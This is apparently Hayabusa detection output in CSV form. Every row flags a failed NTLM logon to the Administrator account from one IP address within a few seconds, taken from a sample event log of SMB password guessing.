2016-09-20 01:51:36.172 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1BmnyTsmP2XqMzf1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NB3xsYe3RcPXhDib | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxN9i8exdO2h4oa7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vjcQaeuo4f8wFXhv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.351 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zCzr77BhliB4KKeb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z558005RepKaO1zZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.448 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HFzW25mJz4JLkv7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.490 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y7J8m97GQWt2cbSs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJrVwcpABBaZ8cyY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VcDw3I4BaFLdIeCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: egEpV9aAuCFjwx2I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: th0ZLWF4YeOaNnkK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ahrOLfdy6DCQ9SfO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.751 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xiooSdP5eib8PUE3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.794 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s6nQ2jp9IGYnGeyD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.839 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ejMtyR5QNdJFhw1W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e50kO0aVhfw5np5T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.913 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 176XyLw6IhEI6NuD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KXCzCSSFvpbWNJFd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XhHRuZYlH8hekaKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.026 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGIUBFRMQ3OBbOA0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.077 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R7CTT5g1w58eRRlS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JmVccmad66uOK9ox | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.163 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t1jlT6kEcs14dcNZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rBty5jOGkkZSZEyD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Ci7YUsO5MtFkDSW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.347 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 12JToliq9mmAuMTQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lw9AgAvBGWoXBlim | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ReGDyvRpGknAKqqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6mdUn8na4asRfpJP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7Wm5p4HnNCbkyh2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MQZwerVd6E08X8Ou | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbDjtLKoX5Q77bn5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O7BNKHiPjzJKCaDk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.714 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHqBI8bzZn5VO9gq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.757 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xz2ZO3b3QSh6Rdqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IEfdhrwbTfCpCXKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kc0LuQzAmQTIF1X3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WMZ70YmzpVp2h8mY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FFVr3Amq6mA3umiu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnN15vqZcww8pqTK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.027 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sSuMRF1txQ9g2Mwi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.073 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tUuapChhs4CGO1cS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.119 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dIMr0hjIkwD8AaEG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.173 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ww9HMQX0cqmolYQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJRRZ5e9lARVZDar | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvUzVoSLqFPAXSWE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SMMgPu1VJIjAWPDW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1JjIa4nOKDTLuAD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0J0GJIm1UUXHH9QJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.419 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YmVX3xIz0hrQFvPr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.470 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nv4tKFEmHjiXkVDI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esdHHJl9LBek9pIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MWofwwLjwiyBk39P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.589 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dvsHFZe7Z1uJ9Dkv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8aDdgwvb1zsZF79k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AQUb6CnMUtyrMNhF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KP5OxHPsbLHnIUBE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ysg903vYFhQHYvFJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IySarHtsTvwSP56H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GnUy8tbCIAVnmhDg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.863 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bfBtc4MnMtPG6MpC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37b8MGIHY8QwXf9K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eDuaWikplDmJNmIE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0kSSoAYJILHCPI7K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.023 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9ikrtTGcZYU1556 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ypyd6SagvUXQHhtZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.100 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWS37lIJ3Q6ghgMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H211KmFImpBRwTGW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 64tO5iBehXQcNc49 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xvxDngRj3j5TAwST | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O8VYRjMnxDgUTWYf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.331 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhWphTesbUf0hwi1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MO8VRRVANxIkDzEX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
